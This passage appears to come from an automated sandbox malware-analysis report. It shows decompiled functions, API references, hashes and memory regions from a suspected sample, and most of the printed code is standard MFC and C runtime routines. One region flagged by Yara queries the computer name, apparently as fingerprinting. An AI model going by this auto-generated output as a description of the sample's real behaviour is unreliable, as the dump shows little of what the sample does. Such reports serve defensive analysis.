                  • Opcode ID: f76e8db3d813109722854849c1a9a733376dd28df11c01fbb442b94c52c1e73b
                  • Instruction ID: 03228c99fea0e0c6e85cead79c0e6d7fcf9e400b22d77e7c5b5f114df3b57783
                  • Opcode Fuzzy Hash: f76e8db3d813109722854849c1a9a733376dd28df11c01fbb442b94c52c1e73b
                  • Instruction Fuzzy Hash: A2F04F34900608CFCF22AF55D8455EEB7B2BF48705F61042AE401732A0DB3A6C81CF59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 90%
                  			E00439212(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
                  				signed int _t13;
                  				intOrPtr _t28;
                  				void* _t29;
                  				void* _t30;
                  
                  				_t30 = __eflags;
                  				_t26 = __edi;
                  				_t25 = __edx;
                  				_t22 = __ebx;
                  				_push(0xc);
                  				_push(0x45e250);
                  				E00431818(__ebx, __edi, __esi);
                  				_t28 = E00436178(__ebx, __edx, __edi, _t30);
                  				_t13 =  *0x463b44; // 0xfffffffe
                  				if(( *(_t28 + 0x70) & _t13) == 0) {
                  					L6:
                  					E0043A0BF(_t22, 0xc);
                  					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
                  					_t8 = _t28 + 0x6c; // 0x6c
                  					_t26 =  *0x463c28; // 0x24310f8
                  					 *((intOrPtr*)(_t29 - 0x1c)) = E004391D4(_t8, _t26);
                  					 *(_t29 - 4) = 0xfffffffe;
                  					E0043927C();
                  				} else {
                  					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
                  					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                  						goto L6;
                  					} else {
                  						_t28 =  *((intOrPtr*)(E00436178(_t22, __edx, _t26, _t32) + 0x6c));
                  					}
                  				}
                  				if(_t28 == 0) {
                  					E0043395F(_t25, _t26, 0x20);
                  				}
                  				return E0043185D(_t28);
                  			}








                  APIs
                  • __getptd.LIBCMT ref: 0043921E
                    • Part of subcall function 00436178: __getptd_noexit.LIBCMT ref: 0043617B
                    • Part of subcall function 00436178: __amsg_exit.LIBCMT ref: 00436188
                  • __getptd.LIBCMT ref: 00439235
                  • __amsg_exit.LIBCMT ref: 00439243
                  • __lock.LIBCMT ref: 00439253
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                  • String ID:
                  • API String ID: 3521780317-0
                  • Opcode ID: 8ff576b7292c7b5a6182514ef2947974fe8b5604b36264260ed5e964655f9010
                  • Instruction ID: db5eb218aed7cb5d1a392201fe744ead5517e1896f3a1eef3f233cd93dbba6bc
                  • Opcode Fuzzy Hash: 8ff576b7292c7b5a6182514ef2947974fe8b5604b36264260ed5e964655f9010
                  • Instruction Fuzzy Hash: 96F06232540701AADB64FF66880274E72A05B0D725F11695FE841672D3CBBC9D009B5E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 75%
                  			E00433D24(long _a4) {
                  				void* _t6;
                  				void* _t9;
                  				void* _t10;
                  
                  				_t11 =  *0x455828;
                  				if( *0x455828 != 0 && E0043BEC0(_t11, 0x455828) != 0) {
                  					 *0x455828();
                  				}
                  				if(E004360FF(_t6) != 0) {
                  					E004362C1(_t6, _t9, _t10, _t2);
                  				}
                  				ExitThread(_a4);
                  			}







                  APIs
                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00433D37
                    • Part of subcall function 0043BEC0: __FindPESection.LIBCMT ref: 0043BF1B
                  • __getptd_noexit.LIBCMT ref: 00433D47
                  • __freeptd.LIBCMT ref: 00433D51
                  • ExitThread.KERNEL32 ref: 00433D5A
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CurrentExitFindImageNonwritableSectionThread__freeptd__getptd_noexit
                  • String ID:
                  • API String ID: 3182216644-0
                  • Opcode ID: 13fc4c004ad8bcee29e09d0495723f2b115e4a7f899d87b3f245987b306b9f3f
                  • Instruction ID: 203174fa76400e9e4076759861b9462e5eb240b4f1b68f0b49cf1372757bfa21
                  • Opcode Fuzzy Hash: 13fc4c004ad8bcee29e09d0495723f2b115e4a7f899d87b3f245987b306b9f3f
                  • Instruction Fuzzy Hash: FDD0123500070566DA153B66EC1F73B3E98DB48727F65503AB504841A3DF6DC991C99C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 64%
                  			E0041365C(void* __ecx, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a24, intOrPtr _a28) {
                  				signed int _v8;
                  				signed int _v12;
                  				signed int _v16;
                  				signed int _v20;
                  				struct tagRECT _v36;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t48;
                  				intOrPtr _t55;
                  				signed int _t69;
                  				intOrPtr* _t73;
                  				void* _t76;
                  				intOrPtr _t82;
                  				signed int _t86;
                  				intOrPtr _t87;
                  				void* _t89;
                  				signed int _t91;
                  				void* _t93;
                  				void* _t95;
                  				void* _t96;
                  				void* _t106;
                  
                  				_t74 = __ecx;
                  				_t95 = __ecx;
                  				_t48 = 0;
                  				_t97 = __ecx;
                  				if(__ecx != 0) {
                  					L2:
                  					if(_a4 == _t48) {
                  						goto L1;
                  					}
                  					_t91 =  *(_t95 + 0x84) & 0x0000a000;
                  					_v16 = _t48;
                  					_v12 = _t48;
                  					_v20 = _t48;
                  					_v8 = _t48;
                  					if( *((intOrPtr*)(_t95 + 0xa4)) <= _t48) {
                  						L24:
                  						_push(1);
                  						_t93 = _v16 + 1;
                  						_t96 = _t95 + 0x9c;
                  						_push(_t48);
                  						E004260F4(_t73, _t96, _t93, _t93);
                  						_t76 = _t96;
                  						L25:
                  						_push(1);
                  						_t42 =  &_a4; // 0x414326
                  						_push( *_t42);
                  						E004260F4(_t73, _t76, _t93, _t93);
                  						return _t93;
                  					} else {
                  						goto L4;
                  					}
                  					do {
                  						L4:
                  						_t73 = E00413638(_t95, _v8);
                  						if(_t73 == 0) {
                  							_t28 =  &_v12; // 0x414326
                  							_v12 = 0;
                  							_v20 = _v20 +  *_t28 -  *0x466524;
                  							_t55 = _a28;
                  							__eflags = _t91;
                  							if(_t91 == 0) {
                  								_t55 = _a24;
                  							}
                  							__eflags = _t55 - _v20;
                  							if(_t55 < _v20) {
                  								__eflags = _v8;
                  								if(_v8 == 0) {
                  									_push(1);
                  									_push(0);
                  									__eflags = _v16 + 1;
                  									E004260F4(_t73, _t95 + 0x9c, _t91, _v16 + 1);
                  								}
                  								_t93 = _v16 + 1;
                  								_t76 = _t95 + 0x9c;
                  								goto L25;
                  							} else {
                  								L21:
                  								_v16 = _v8;
                  								goto L22;
                  							}
                  						}
                  						if( *((intOrPtr*)( *_t73 + 0x168))() == 0) {
                  							goto L22;
                  						}
                  						GetWindowRect( *(_t73 + 0x20),  &_v36);
                  						E00422BFB(_t95,  &_v36);
                  						_t82 = _v36.right;
                  						_t87 = _v36.bottom;
                  						if(_t91 == 0) {
                  							_t69 = _t82 - _v36.left - 1;
                  							__eflags = _t69;
                  						} else {
                  							_t69 = _t87 - _v36.top;
                  						}
                  						if(_v12 <= _t69) {
                  							if(_t91 == 0) {
                  								_t86 = _t82 - _v36.left - 1;
                  								__eflags = _t86;
                  								_v12 = _t86;
                  							} else {
                  								_v12 = _t87 - _v36.top;
                  							}
                  						}
                  						if(_t91 == 0) {
                  							__eflags = _a12 - _v36.top;
                  						} else {
                  							_t106 = _a8 - _v36.left;
                  						}
                  						if((0 | _t106 > 0x00000000) != 0) {
                  							goto L21;
                  						}
                  						L22:
                  						_v8 = _v8 + 1;
                  					} while (_v8 <  *((intOrPtr*)(_t95 + 0xa4)));
                  					_t48 = 0;
                  					goto L24;
                  				}
                  				L1:
                  				_t48 = E00406436(_t73, _t74, _t89, _t95, _t97);
                  				goto L2;
                  			}



























                  APIs
                  • GetWindowRect.USER32 ref: 004136C8
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Exception@8H_prolog3RectThrowWindow
                  • String ID: &CA$&CA
                  • API String ID: 3517363987-339850520
                  • Opcode ID: a56d8a55cfae5af6352e97de880f8e6a5960eb7f6f67abfc6bdadb55ace455b2
                  • Instruction ID: 4f4a0c8e80f02a4d6620a452c76b11ac0f5120761df8692bc9f0a1959f1c83b8
                  • Opcode Fuzzy Hash: a56d8a55cfae5af6352e97de880f8e6a5960eb7f6f67abfc6bdadb55ace455b2
                  • Instruction Fuzzy Hash: 06414FB5A00219EFCF14DFA8C980AEEB7B5BB44301F15816EE416E7380DB789E81CB54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 96%
                  			E0042DE22(intOrPtr* __ecx, void* __edx, void* __eflags, intOrPtr _a4, CHAR* _a8, signed int _a12, intOrPtr _a16) {
                  				struct tagRECT _v20;
                  				char* _v28;
                  				signed int _v36;
                  				intOrPtr _v56;
                  				intOrPtr _v60;
                  				intOrPtr _v64;
                  				char _v68;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				intOrPtr _t36;
                  				void* _t42;
                  				void* _t50;
                  				intOrPtr* _t57;
                  				void* _t65;
                  				signed int _t66;
                  				intOrPtr* _t69;
                  				void* _t72;
                  
                  				_t72 = __eflags;
                  				_t65 = __edx;
                  				_t66 = _a12;
                  				_t69 = __ecx;
                  				 *(__ecx + 0x84) = _t66 & 0x0040ffff;
                  				E00431160(_t66,  &_v68, 0, 0x30);
                  				_v28 = "AfxControlBar90s";
                  				_v36 = _t66 | 0x40000000;
                  				_v60 = _a16;
                  				_v64 =  *((intOrPtr*)(E0041F363(0, _t66 | 0x40000000, _t69, _t72) + 8));
                  				_t36 = _a4;
                  				if(_t36 != 0) {
                  					_v56 =  *((intOrPtr*)(_t36 + 0x20));
                  				} else {
                  					_v56 = 0;
                  				}
                  				_push( &_v68);
                  				_t57 = _t69;
                  				if( *((intOrPtr*)( *_t69 + 0x64))() != 0) {
                  					_t68 = _a8;
                  					 *((intOrPtr*)(_t69 + 0xa4)) = _a8;
                  					E00411F96(0, _t57, _a8, _t69, __eflags, 0x10);
                  					E00411F96(0, _t57, _t68, _t69, __eflags, 0x3c000);
                  					_t42 = E00417E26(_t69, _t65, __eflags, _t68, _a4);
                  					 *((intOrPtr*)(_t69 + 0xa4)) = 0;
                  					__eflags = _t42;
                  					if(_t42 == 0) {
                  						goto L4;
                  					}
                  					E00412C0B(_t69, _a16);
                  					GetWindowRect( *(_t69 + 0x20),  &_v20);
                  					 *((intOrPtr*)(_t69 + 0x9c)) = _v20.bottom - _v20.top;
                  					 *((intOrPtr*)(_t69 + 0x98)) = _v20.right - _v20.left;
                  					E00412B6C(_t69, 0, 0x4000000, 0);
                  					_t50 = E004122AD(_t69, _t68);
                  					__eflags = _t50;
                  					if(_t50 == 0) {
                  						goto L4;
                  					}
                  					E00412D05(_t69, 0, 0, 0, 0, 0, 0x54);
                  					__eflags = 1;
                  					return 1;
                  				} else {
                  					L4:
                  					return 0;
                  				}
                  			}























                  APIs
                  • _memset.LIBCMT ref: 0042DE48
                    • Part of subcall function 00411F96: _memset.LIBCMT ref: 00411FC6
                    • Part of subcall function 00417E26: FindResourceA.KERNEL32(?,?,00000005), ref: 00417E42
                    • Part of subcall function 00417E26: LoadResource.KERNEL32(?,00000000), ref: 00417E4A
                    • Part of subcall function 00417E26: LockResource.KERNEL32(00000000), ref: 00417E57
                    • Part of subcall function 00417E26: FreeResource.KERNEL32(00000000,00000000,?,?), ref: 00417E6F
                  • GetWindowRect.USER32 ref: 0042DED9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Resource$_memset$FindFreeLoadLockRectWindow
                  • String ID: AfxControlBar90s
                  • API String ID: 2572468386-4082281646
                  • Opcode ID: 8ef9e049ffa48c2aa6230c8892a9e22c2e9c0ae3b3c34c7fa8001824ef8db9a6
                  • Instruction ID: e5b2b79bd6c95d178e32231d7f74e943e7f72560d624d97ef41cbe9ba629f01b
                  • Opcode Fuzzy Hash: 8ef9e049ffa48c2aa6230c8892a9e22c2e9c0ae3b3c34c7fa8001824ef8db9a6
                  • Instruction Fuzzy Hash: C2317E71A00218AFDB10EFA5D985AAFBBB9AF44348F01442EF546E7251D7789D018B58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetComputerNameW.KERNEL32(?,?), ref: 0231D179
                  • WideCharToMultiByte.KERNEL32(00000000,00000400,?,000000FF,?,00000010,00000000,00000000), ref: 0231D1A6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646512151.0000000002311000.00000020.00000001.sdmp, Offset: 02311000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2311000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharComputerMultiNameWide
                  • String ID: X
                  • API String ID: 4013585866-3081909835
                  • Opcode ID: fe8f466b7cf88bcb81779cf220beef56a044c43aa31c21a1a33b7f00b86316fc
                  • Instruction ID: 53cc2099476e6e33a7a0b22de51f471fb859cc21d8df43f59e37a8987a308a65
                  • Opcode Fuzzy Hash: fe8f466b7cf88bcb81779cf220beef56a044c43aa31c21a1a33b7f00b86316fc
                  • Instruction Fuzzy Hash: 46118C71D4110C6AEB38D6A89D44BEB77BEAF0B308F500026E945F61C0EB604A1B87A2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0042F2FE(void* __ecx, void* __eflags, intOrPtr _a4, signed int _a8) {
                  				intOrPtr _v40;
                  				intOrPtr _v44;
                  				intOrPtr _v48;
                  				void* _v52;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				void* _t26;
                  				intOrPtr _t32;
                  				void* _t36;
                  				signed int _t37;
                  				void* _t40;
                  				intOrPtr _t41;
                  				signed int _t42;
                  				void* _t43;
                  
                  				_t39 = __ecx;
                  				_t43 = __ecx;
                  				_t26 = E0041F396(_t36, __ecx, _t40, __ecx, __eflags);
                  				_t41 =  *((intOrPtr*)(_t26 + 0x3c));
                  				if(_a4 != 0) {
                  					_t42 = _a8;
                  					__eflags =  *(__ecx + 0x3c) & _t42;
                  					if(__eflags == 0) {
                  						 *((intOrPtr*)(E0041F363(_t36, _t42, __ecx, __eflags) + 0x38)) = E0042F2EA;
                  						_t24 = _t43 + 0x3c;
                  						 *_t24 =  *(_t43 + 0x3c) | _t42;
                  						__eflags =  *_t24;
                  					}
                  				} else {
                  					_t37 = _a8;
                  					if(( *(__ecx + 0x3c) & _t37) != 0) {
                  						_t49 =  *((intOrPtr*)(_t26 + 0x40)) - __ecx;
                  						if( *((intOrPtr*)(_t26 + 0x40)) == __ecx) {
                  							E0040D89A(_t39, _t49, 1);
                  						}
                  						if(_t41 != 0 &&  *(_t41 + 0x20) != 0) {
                  							E00431160(_t41,  &_v52, 0, 0x30);
                  							_t32 =  *((intOrPtr*)(_t43 + 0x20));
                  							_v44 = _t32;
                  							_v40 = _t32;
                  							_v52 = 0x2c;
                  							_v48 = 1;
                  							SendMessageA( *(_t41 + 0x20), 0x405, 0,  &_v52);
                  						}
                  						 *(_t43 + 0x3c) =  *(_t43 + 0x3c) &  !_t37;
                  					}
                  				}
                  				return 1;
                  			}

                  APIs
                  • _memset.LIBCMT ref: 0042F33F
                  • SendMessageA.USER32(00000000,00000405,00000000,?), ref: 0042F36C
                    • Part of subcall function 0040D89A: SendMessageA.USER32(?,00000401,00000000,00000000), ref: 0040D8BF
                    • Part of subcall function 0040D89A: GetKeyState.USER32(00000001), ref: 0040D8D4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MessageSend$State_memset
                  • String ID: ,
                  • API String ID: 930327405-3772416878
                  • Opcode ID: 40101904e8074d280dcb2c4609b351c52c5efd4c9a9780d6c8a9c199d9d1a8af
                  • Instruction ID: 7c540c80431b337250ce6ddfd8c45ad52cb60da89bd9e6b3c434e6b46047bbb6
                  • Opcode Fuzzy Hash: 40101904e8074d280dcb2c4609b351c52c5efd4c9a9780d6c8a9c199d9d1a8af
                  • Instruction Fuzzy Hash: EE118F71A00714EFD720DFA2D885B9BB7B4FB44724F94403BE94566A81D3B9A848CF98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 81%
                  			E004295D3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				struct HINSTANCE__* _t24;
                  				_Unknown_base(*)()* _t25;
                  				void* _t28;
                  				signed int* _t47;
                  				void* _t48;
                  				void* _t49;
                  				void* _t50;
                  
                  				_t50 = __eflags;
                  				_t43 = __edx;
                  				_push(4);
                  				E00431A9B(E0044C987, __ebx, __edi, __esi);
                  				_t47 =  *(_t49 + 0x10);
                  				 *_t47 =  *_t47 & 0x00000000;
                  				E00429544(_t50, _t49 - 0x10,  *((intOrPtr*)(_t49 + 8)));
                  				 *(_t49 - 4) =  *(_t49 - 4) & 0x00000000;
                  				_t34 = _t49 + 0x10;
                  				E004014C0(_t49 + 0x10, __edx);
                  				 *(_t49 - 4) = 1;
                  				if(E00428ECF(__ebx,  *((intOrPtr*)(_t49 - 0x10)), _t49 + 0x10) != 0) {
                  					_t45 =  *(_t49 + 0x10);
                  					_push( *(_t49 + 0x10));
                  					_t24 = E0040D5D6(__ebx, _t34,  *(_t49 + 0x10), _t47, __eflags);
                  					__eflags = _t24;
                  					if(_t24 != 0) {
                  						_t25 = GetProcAddress(_t24, "DllGetClassObject");
                  						__eflags = _t25;
                  						if(_t25 == 0) {
                  							_t48 = 0x800401f9;
                  						} else {
                  							_t48 =  *_t25( *((intOrPtr*)(_t49 + 8)),  *((intOrPtr*)(_t49 + 0xc)), _t47);
                  						}
                  					} else {
                  						_t48 = 0x80040154;
                  					}
                  					E004010B0(_t45 - 0x10, _t43);
                  					E004010B0( *((intOrPtr*)(_t49 - 0x10)) + 0xfffffff0, _t43);
                  					_t28 = _t48;
                  				} else {
                  					E004010B0( &(( *(_t49 + 0x10))[0xfffffffffffffffc]), __edx);
                  					E004010B0( *((intOrPtr*)(_t49 - 0x10)) + 0xfffffff0, __edx);
                  					_t28 = 0x80040154;
                  				}
                  				return E00431B73(_t28);
                  			}

                  APIs
                  • __EH_prolog3.LIBCMT ref: 004295DA
                    • Part of subcall function 00429544: swprintf.LIBCMT ref: 004295AC
                    • Part of subcall function 00428ECF: RegOpenKeyA.ADVAPI32(80000000,CLSID,004542E8), ref: 00428F09
                    • Part of subcall function 00428ECF: RegOpenKeyA.ADVAPI32(00000000,00000000,00000000), ref: 00428F1D
                    • Part of subcall function 00428ECF: RegOpenKeyA.ADVAPI32(00000000,InProcServer32,?), ref: 00428F38
                    • Part of subcall function 00428ECF: RegQueryValueExA.ADVAPI32(?,0044F0F5,00000000,?,?,?), ref: 00428F52
                    • Part of subcall function 00428ECF: RegCloseKey.ADVAPI32(?), ref: 00428F62
                    • Part of subcall function 00428ECF: RegCloseKey.ADVAPI32(00000000), ref: 00428F67
                    • Part of subcall function 00428ECF: RegCloseKey.ADVAPI32(?), ref: 00428F6C
                  • GetProcAddress.KERNEL32(00000000,DllGetClassObject), ref: 00429664
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CloseOpen$AddressH_prolog3ProcQueryValueswprintf
                  • String ID: DllGetClassObject
                  • API String ID: 351166792-1075368562
                  • Opcode ID: a2af5851b5f9c2a8f2810f26ec62040dd75bd947e17a2e76fea4f4d2e651c228
                  • Instruction ID: 5b860a2193ce736a33cf6f6595f981836a9396f171d314495cd57ecb9bcc038c
                  • Opcode Fuzzy Hash: a2af5851b5f9c2a8f2810f26ec62040dd75bd947e17a2e76fea4f4d2e651c228
                  • Instruction Fuzzy Hash: 10116071600266ABCF10EFA1CC51BBF77B4AF00368F54052EB925A72E1DB39995087AD
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 71%
                  			E00429544(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
                  				signed int _v8;
                  				long _v264;
                  				signed int _v268;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t19;
                  				intOrPtr _t28;
                  				intOrPtr _t42;
                  				intOrPtr _t43;
                  				void* _t44;
                  				intOrPtr _t46;
                  				void* _t47;
                  				signed int _t50;
                  				void* _t54;
                  
                  				_t54 = __eflags;
                  				_t48 = _t50;
                  				_t19 =  *0x463404; // 0x38a11573
                  				_v8 = _t19 ^ _t50;
                  				_t21 = _a8;
                  				_t45 = _a4;
                  				_v268 = _v268 & 0x00000000;
                  				swprintf( &_v264, 0x100, "{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}",  *_a8,  *(_a8 + 4) & 0x0000ffff,  *(_t21 + 6) & 0x0000ffff,  *(_t21 + 8) & 0x000000ff,  *(_t21 + 9) & 0x000000ff,  *(_t21 + 0xa) & 0x000000ff,  *(_t21 + 0xb) & 0x000000ff,  *(_t21 + 0xc) & 0x000000ff,  *(_t21 + 0xd) & 0x000000ff,  *(_t21 + 0xe) & 0x000000ff,  *(_t21 + 0xf) & 0x000000ff, _t44, _t47);
                  				_push( &_v264);
                  				E00406039(_t28, _a4, _t42, _t43, _a4, _t54);
                  				_pop(_t46);
                  				return E00430650(_t45, _t28, _v8 ^ _t48, _t42, _t43, _t46);
                  			}

                  APIs
                  • swprintf.LIBCMT ref: 004295AC
                    • Part of subcall function 00431BA5: __vsprintf_s_l.LIBCMT ref: 00431BB9
                    • Part of subcall function 00406039: __EH_prolog3.LIBCMT ref: 00406040
                  Strings
                  • BE, xrefs: 00429546
                  • {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}, xrefs: 004295A1
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3__vsprintf_s_lswprintf
                  • String ID: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}$BE
                  • API String ID: 3725010724-2349691909
                  • Opcode ID: 0be7013e89477d83986835f1b6856c71d5ba30b29e557d3825a3ce492c276c41
                  • Instruction ID: a3497880cab5cd600a8beb7780eea5b2b7ea81012c6d0ff42360ce47a048c1db
                  • Opcode Fuzzy Hash: 0be7013e89477d83986835f1b6856c71d5ba30b29e557d3825a3ce492c276c41
                  • Instruction Fuzzy Hash: 091148B51180A46AC3198B9A9CA4E76BFF85B0C302F0980CEF5C95B192D57CD640CB38
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 65%
                  			E00415621(void* __ecx) {
                  				signed int _v8;
                  				char _v20;
                  				char _v280;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t9;
                  				long _t12;
                  				intOrPtr _t13;
                  				intOrPtr _t19;
                  				intOrPtr _t24;
                  				intOrPtr _t25;
                  				intOrPtr _t29;
                  				signed int _t34;
                  
                  				_t32 = _t34;
                  				_t9 =  *0x463404; // 0x38a11573
                  				_v8 = _t9 ^ _t34;
                  				_t12 = GetModuleFileNameA( *(__ecx + 0x44),  &_v280, 0x104);
                  				if(_t12 == 0) {
                  					L4:
                  					_t13 = 0;
                  					__eflags = 0;
                  				} else {
                  					_t38 = _t12 - 0x104;
                  					if(_t12 == 0x104) {
                  						goto L4;
                  					} else {
                  						 *(PathFindExtensionA( &_v280)) = 0;
                  						asm("movsd");
                  						asm("movsd");
                  						asm("movsb");
                  						_t13 = E004153B2(_t19,  &_v20, "%s%s.dll", _t38,  &_v20,  &_v280);
                  						_t25 = _t25;
                  					}
                  				}
                  				_pop(_t29);
                  				return E00430650(_t13, _t19, _v8 ^ _t32, _t24, _t25, _t29);
                  			}

                  APIs
                  • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00415649
                  • PathFindExtensionA.SHLWAPI(?), ref: 0041565F
                    • Part of subcall function 004153B2: __EH_prolog3_GS.LIBCMT ref: 004153BC
                    • Part of subcall function 004153B2: GetModuleHandleA.KERNEL32(kernel32.dll,0000015C,00415683,?,?), ref: 004153EC
                    • Part of subcall function 004153B2: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 00415400
                    • Part of subcall function 004153B2: ConvertDefaultLocale.KERNEL32(?), ref: 0041543C
                    • Part of subcall function 004153B2: ConvertDefaultLocale.KERNEL32(?), ref: 0041544A
                    • Part of subcall function 004153B2: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 00415467
                    • Part of subcall function 004153B2: ConvertDefaultLocale.KERNEL32(?), ref: 00415492
                    • Part of subcall function 004153B2: ConvertDefaultLocale.KERNEL32(000003FF), ref: 0041549B
                    • Part of subcall function 004153B2: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00415550
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3_HandlePath
                  • String ID: %s%s.dll
                  • API String ID: 1311856149-1649984862
                  • Opcode ID: d1a69b97d847e92fd9b44ca0b99216e3aff88d8da71c5e72d01b3b1870190964
                  • Instruction ID: 7ab096ee9f5a6c228af4c8b577f9b175102377d2c61d11fa4c3138e872793942
                  • Opcode Fuzzy Hash: d1a69b97d847e92fd9b44ca0b99216e3aff88d8da71c5e72d01b3b1870190964
                  • Instruction Fuzzy Hash: DD01D171A001189FCB10DF68DC02AEBB7FCAB89700F0104B6E905E7211DA74AE448BA9
                  Uniqueness

